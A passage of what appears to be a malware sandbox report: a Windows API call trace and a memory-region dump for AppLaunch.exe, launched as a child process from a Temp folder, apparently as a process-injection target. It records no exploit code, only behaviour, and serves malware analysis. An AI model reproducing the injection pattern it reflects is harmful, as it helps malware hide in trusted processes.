[125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0245.851] ResumeThread (hThread=0xa8) returned 0x1 [0245.851] CloseHandle (hObject=0xac) returned 1 [0245.851] CloseHandle (hObject=0xa8) returned 1 [0245.852] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0245.853] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac38 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cc50 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cc60 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8bca0 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8e010 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abf8 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8ac08 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cdd0 | out: hHeap=0xa70000) returned 1 [0245.899] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8bc80 | out: hHeap=0xa70000) returned 1 [0245.900] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8abe8 | out: hHeap=0xa70000) returned 1 [0245.900] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa862a8 | out: hHeap=0xa70000) returned 1 [0245.900] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa88140 | out: hHeap=0xa70000) returned 1 [0245.900] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8a468 | out: hHeap=0xa70000) returned 1 [0245.900] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa84600 | out: hHeap=0xa70000) returned 1 [0245.901] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa86220 | out: hHeap=0xa70000) returned 1 [0245.918] GetLastError () returned 0x1e7 [0245.918] SetLastError (dwErrCode=0x1e7) [0245.918] GetLastError () returned 0x1e7 [0245.918] SetLastError (dwErrCode=0x1e7) [0245.919] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8cfd8 | out: hHeap=0xa70000) returned 1 [0245.920] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8c448 | out: hHeap=0xa70000) returned 1 [0245.920] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0245.920] GetLastError () returned 0x7e [0245.921] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fec0 | out: phModule=0x18fec0) returned 0 [0245.921] ExitProcess (uExitCode=0x0) [0245.921] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8e000 | out: hHeap=0xa70000) returned 1 [0245.922] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa8e3e8 | out: hHeap=0xa70000) returned 1 [0245.922] HeapFree (in: hHeap=0xa70000, dwFlags=0x0, lpMem=0xa881d0 | out: hHeap=0xa70000) returned 1 Process: id = "13" image_name = "applaunch.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe" page_root = "0x259f4000" os_pid = "0xfc8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0xfb0" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" cur_dir = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4823 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4824 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4825 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4826 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 4827 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 4828 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 4829 start_va = 0x340000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4830 start_va = 0x1160000 end_va = 0x1178fff monitored = 0 entry_point = 0x116fb00 region_type = mapped_file name = "applaunch.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe") Region: id = 4831 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4832 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4833 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4834 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4835 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000fffb0000" filename = "" Region: id = 4836 start_va = 0xfffdb000 end_va = 0xfffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffdb000" filename = "" Region: id = 4837 start_va = 0xfffde000 end_va = 0xfffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffde000" filename = "" Region: id = 4838 start_va = 0xfffdf000 end_va = 0xfffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffdf000" filename = "" Region: id = 4839 start_va = 0xfffe0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffe0000" filename = "" Region: id = 4841 start_va = 0x70000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4842 start_va = 0x200000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4843 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4844 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4845 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4846 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4847 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4848 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4849 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 4850 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4851 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 4852 start_va = 0x440000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4853 start_va = 0x753a0000 end_va = 0x753e9fff monitored = 1 entry_point = 0x753a2e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 4854 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4855 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4856 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4857 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4858 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4859 start_va = 0x90000 end_va = 0xf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4860 start_va = 0x5b0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4861 start_va = 0x6d0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4862 start_va = 0x7fff0000 end_va = 0x7fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4863 start_va = 0x80000000 end_va = 0x8000ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000080000000" filename = "" Region: id = 4864 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4865 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4866 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4867 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4868 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4869 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4870 start_va = 0x280000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4871 start_va = 0x75310000 end_va = 0x7539cfff monitored = 1 entry_point = 0x75322860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 4872 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4873 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4874 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4875 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4876 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4877 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4878 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 4879 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4880 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4881 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4882 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4883 start_va = 0x9e0000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 4884 start_va = 0x1180000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 4885 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4886 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4887 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4888 start_va = 0x71d30000 end_va = 0x724defff monitored = 1 entry_point = 0x71d4d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 4889 start_va = 0x724e0000 end_va = 0x72c8efff monitored = 1 entry_point = 0x724fd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 4890 start_va = 0x71d30000 end_va = 0x724defff monitored = 1 entry_point = 0x71d4d0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 4891 start_va = 0x753f0000 end_va = 0x75403fff monitored = 0 entry_point = 0x753fac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 4892 start_va = 0x72be0000 end_va = 0x72c8afff monitored = 0 entry_point = 0x72c75f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 4893 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 4894 start_va = 0x110000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 4895 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4896 start_va = 0x130000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 4897 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 4898 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 4899 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4900 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4901 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4902 start_va = 0xb70000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 4903 start_va = 0x280000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4904 start_va = 0x330000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4905 start_va = 0x750000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4906 start_va = 0x810000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 4907 start_va = 0xda0000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 4908 start_va = 0xfffd8000 end_va = 0xfffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffd8000" filename = "" Region: id = 4909 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4910 start_va = 0x2580000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 4911 start_va = 0x5b0000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4912 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 4913 start_va = 0x7c0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 4914 start_va = 0xf80000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 4915 start_va = 0xfffd5000 end_va = 0xfffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffd5000" filename = "" Region: id = 4916 start_va = 0x460000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4917 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 4918 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 4919 start_va = 0xfffad000 end_va = 0xfffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffad000" filename = "" Region: id = 4920 start_va = 0x4700000 end_va = 0x49cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4921 start_va = 0x70920000 end_va = 0x71d2afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = 